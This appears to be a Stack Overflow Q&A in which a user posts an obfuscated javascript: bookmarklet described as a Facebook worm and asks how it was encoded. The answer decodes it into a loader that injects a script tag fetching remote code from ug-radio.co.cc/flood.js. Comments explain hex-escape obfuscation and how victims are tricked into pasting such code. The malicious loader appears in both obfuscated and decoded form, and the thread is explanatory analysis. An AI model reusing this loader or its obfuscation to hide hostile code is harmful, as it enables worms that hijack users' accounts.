# How to encode this script?

Tags: javascript

I have recently found this srcipt, which is basically a facebook "worm", so dont run it. All I want to know is how the creator went about encoding it. Any help?

```
javascript:var _0x8dd5=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x7 2\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x 68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64 \x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x 6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\ x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0x8dd5[2]](_0x8dd5[1]))[_0x8dd5[0]]=_0x8dd5[3];b[_0x8dd5[5]][_0x8dd5[4]](a); void (0);
```

Comment: It's [obstruficated](http://www.google.com/search?q=javascript+obscrifcator).  It can be cleaned up using [JS Beautifier](http://jsbeautifier.org/)

Comment: I think you mean 'obfuscated'.

Answer (score 4):

The author used various methods of 'obfuscation', that is, various techniques to make the code visually confusing and hard to understand.

`_0x8dd5` is an array of strings:

```
['src', 'script', 'createElement',
    'http://ug-radio.co.cc/flood.js', 'appendChild', 'body']
```

The rest of the code uses property names from the strings above, such that the un-obfuscated code is actually

```
a = document.createElement('script');
a.src = 'http://ug-radio.co.cc/flood.js';
document.body.appendChild(a);
```

Therefore, all the author did to obfuscate the code is to reference all property names as strings from an array. The array that contains the strings simply uses the `\xNN` hexadecimal escape notation, making it less obvious as to what those strings are.

The author does this by finding the hexadecimal values of the bytes that form the strings in the current encoding. Then, for each byte in the strings, he adds `\xNN`, where `NN` is the hexadecimal byte value. When the JavaScript interpreter runs the script, the parser automatically replaces these escapes with their respective characters.

Comment: i know what the script does, another question showed me that. I wanted to know exactly how he encoded it.

Comment: can you show me a rough breakdown of how he obfuscated it? Sorry, im pretty new to js.

Comment: @Emily If you wrote the original script in a similar way: using an array of strings and then referencing to the array, you could use a code obfuscator that translates strings into utf-8 encoding with a tool like http://javascriptobfuscator.com/default.aspx or similar

Comment: wow, great. Thanks for the info. One more thing though. Im interested in knowing how the creator ran a script from an external host (ug-radio.co.cc) on facebook. Is there a js script which allows you to include an external script?

Comment: @Emily. The encoded script created a `script` tag which included the external Javascript. He still had to somehow trick the user into inserting the original encoded Javascript manually, or via a security flaw in Facebook.